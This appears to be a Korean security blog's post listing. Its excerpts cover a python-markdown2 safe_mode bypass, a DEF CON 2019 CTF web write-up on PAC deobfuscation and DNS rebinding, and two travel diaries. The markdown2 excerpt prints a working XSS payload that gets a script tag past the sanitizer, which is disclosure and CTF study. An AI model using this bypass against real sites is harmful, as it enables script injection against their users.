[python-markdown2] safe_mode Filter bypass 분석글

이미지
개요 * 작성일 기준 version: 2.3.8 ( https://github.com/trentm/python-markdown2/tree/4d2fc792abd7fbf8ddec937812857f13fded61cf ) CTF하다가 markdown2 모듈을 사용하길래 해당 모듈 찾아보다가 아래 이슈를 발견하였다. https://github.com/trentm/python-markdown2/issues/341 Filter Bypass ????!! - Expected Result ```python >>> import markdown2 >>> markdown2.markdown("[<script>alert(1)</script>]()", safe_mode=True) '<p><a href="#">[HTML_REMOVED]alert(1)[HTML_REMOVED]</a></p>\n' ``` - Issue Payload ```python >>> import markdown2 >>> markdown2.markdown('<http://g<!s://q?<!-<[<script>alert(1);/\*](http://g)->a><http://g<!s://g.c?<!-<[a\\*/</script>alert(1);/*](http://g)->a>', safe_mode=True) '<p><http://g<!s://q?<!-&lt;<a href="http://g"><script>alert(1);/*</a>->a><http://g<!s://g.c?<!-&lt;<a href=...

2019 미국 방문기

이미지
Day 1 ( Incheon -> Las Vegas) 비행기 출발 전 저녁 9시에 출발해서 12시간 쯤 걸려서 라스베가스(LAS)에 도착했다. (비행기 안에서 죽는줄 알았다. ㅡ.ㅡ) 너무 피곤해서 도착하자마자 바로 호텔로갔다. 이번에는 Bally's Hotel로 예약을 했다. Bally's Hotel Room 장시간 비행 + 시차로 인해 피곤해서 밥먹고 바로 잤다. 호텔 주변 식당에서 먹은건데 너무 피곤해서 맛도 기억이 안난다.... Day 2 라스베가스에 머무는 기간이 짧아서 조금 무리한 일정으로 그랜드 캐니언 밤도깨비 투어를 신청했다. 새벽에 출발하는 일정이고 그랜드 캐니언까지 가는 차에서 자면되겠지 하면서 신청했는데 자도 자도 너무 힘들었다. I LOVE LASVEGAS ! 사진으로 다 담을수 없어서 아쉽다. ㅠ.ㅠ 가는 길 중간 중간에 멈춰서 사진을 찍었다. 원래 같이 가는 일정을 신청한게 나 포함 6명이였는데 가는 포인트마다 아는 사람을 만나서 재미있게 놀았다. 거의 다 도착해서 밥을 먹었다. 그쯤 해가 뜨기 시작했다. WoW ~! WoW 22 해가 뜨니 풍경들이 보이기 시작했다. 그리고 앤텔로프 캐니언와 홀스슈 밴드에 갔었다. 해가 뜰때 풍경은 좋았는데, 사막이라는걸 몸소 느낄 수 있었다. 덥고 해가 너무 뜨거웠다. 그래서 그랜드 캐니언은 한번 갔다오면 기가 다 빠지는거 같다.  그렇게 투어하고 호텔로 돌아가는 길에 인앤아웃버거 먹고 바로 잤다. Day 3 오전에는 뭐했는지 정확히 기억이 안난다. ㅡ.ㅡ 그러다가 회사 사람들과 paris hotel에 있는 " Mon Ami Gabi " 레스토랑에서 저녁을 먹었다. 이때는 무슨 생각이였는지 모르겠지만 새로운걸 먹겠다고 생선 요리를 시켰다. 연어 였던걸로 기억하는데 너무 짜서 다먹지 못했다. ㅠㅠ 그리고 벨라지오...

Defcon CTF quals 2019 : ooops

Category: Web Points: 137 Solves: 34 ## Description ``` On our corporate network, the only overflow is the Order of the Overflow. <a href="https://s3.us-east-2.amazonaws.com/oooverflow-challs/b48fb18a0837e8e6840d5101ff44bb9ee5ee1d22846580487ccce756b966f6b2/info.pac">info.pac</a> ``` ## Write-up ### 1. javascript deobfuscate. Change `eval` to `console.log`. ```js FindProxyForURL = function(url, host) { /* The only 'overflow' that employees can access is the Order of the Overflow. Log in with OnlyOne:Overflow. HTTPS support is coming soon. */ if (shExpMatch(host, 'oooverflow.io')) return 'DIRECT'; return 'PROXY ooops.quals2019.oooverflow.io:8080'; } ``` we can access challenge page ! ### 2. DNS Rebinding. if you send a URL, the bot access to the URL. And you look at the referer of http header, you can see that it starts from the internal IP address. (ex: 10.x.x.x) I tried DNS rebinding. I could not access the internal...

2018 싱가포르 방문기

이미지
Day 1 오후 비행기를 타고 슝~ 생각보다 오래걸렸다. 6시간 정도? 그래서 기내식도 나와서 자다가 먹고 또 자다보니 도착했다. ㅋ 기내식 ㅎㅎ 호텔 체크인을 하고 먼저 싱가포르에 도착해있던 일행들을 만나서 저녁을 먹었다. 시장에서 바로 구워서 바로 먹을 수 있었다. 꿀맛~ Day 2 아침 일찍 눈이 떠졌다. 배고파서 호텔 1층 레스토랑에서 아침을 먹고 호텔 수영장에서 놀았다. 그리고 오후에는 싱가포르에서 일하고 계시는 분이 투어를 도와주셨다. 처음으로 가든스 바이 더 베이에 갔다. 밖은 무지 더웠는데 안에 들어가니 너무 시원했다. ㅎ 안에는 다양한 식물들이 있고 시원하다. 계속 있다보면 기분이 좋아진다. 그리고 바로 옆에 있는 마리나 베이 호텔까지 구경하고 저녁을 먹으러 어떤 시장에 갔다. (따라다녀서 이름은 기억이 나지 않는다. ㅡ.ㅡㅋ) 칠리 크랩 !! 역시 싱가포르 답게 다양한 해산물을 먹어보았다. 그중 최고는 칠리 크랩인데 같이 나오는 빵을 칠리 크랩 소스에 찍어서 먹으면 정말 맛있다. ㅎㅎ 먹고 소화 시킬겸 기념품 사러 마트에 갔다가 하루 마무리~ Day 3,4 (HITB-XCTF GSEC CTF) 구석 자리를 배정받았다. ㅎㅎ 대회가 끝나고 대회에 참여한 다른 한국팀분들과 같이 저녁 먹고 투어를 했다. ㅎ 마리나 베이 샌즈 야경 마리나 베이 샌즈에 있다가 운좋게 레이저 쇼하는 시간에 딱 맞아서 볼 수 있었다. 물을 뿌리고 그위에 레이저를 쏜다. 한번 시작하면 10분정도 한다. Day 5 싱가포르에 사시는 분께서 투어를 도와주시기로 한 날이다. 점심으로는 카야 토스트를 먹었다. 계란을 푼거에 같이 먹는데 진짜 맛있었다. 그리고 지하철을 타고 센토사 섬으로 갔다. 들어갈때는 걸어서 들어갔다. (나올때는 트램을 타고 나왔다.) 섬안에 구경할거도 많고 루지와 같이 즐길거리도 많았다. 센토사까지 왔으면 루지는 타보는...